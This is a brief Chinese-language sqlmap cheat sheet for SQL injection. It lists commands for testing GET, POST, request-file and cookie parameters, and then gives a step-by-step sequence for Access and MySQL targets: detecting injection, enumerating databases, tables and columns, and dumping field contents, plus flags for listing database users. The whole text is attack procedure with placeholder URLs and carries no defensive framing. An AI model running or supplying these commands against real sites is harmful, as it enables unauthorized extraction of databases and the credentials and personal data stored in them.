get方式检查方法:
sqlmap -u "网址"
post方法检查方法:
1.sqlmap -u "网址" --data "post参数=post数据"
2.sqlmap -r x.txt 直接根据请求包注入,在请求包里每个消息头最后加*,就是添加对该信息头的注入
cookie方式检测方法:
sqlmap -u "网址" --cookie "cookie值"
不同数据库注入方法:
access数据库:
判断:sqlmap -u "网址"
列出所有表名: sqlmap -u "网址" --tables
针对表列出所有列名:sqlmap -u "网址" -T "表名" --columns
针对列名列出字段:sqlmap -u "网址" --dump -T "表名" -C "列名"
mysql数据库:
判断:sqlmap -u "网址"
列出所有库名:sqlmap -u "网址" --dbs
列出当前网站所使用的数据库库名: sqlmap -u "网址" --current-db
列出针对某数据库的所有表名: sqlmap -u "网址" -D "数据库名" --tables
针对表列出所有列名:sqlmap -u "网址" -D "数据库名" -T "表名" --columns
针对列名列出字段:sqlmap -u "网址" --dump -D “数据库名” -T "表名" -C "列名"
列出管理数据库的用户名: --users
列出当前用户名: --current-user
读取数量: --count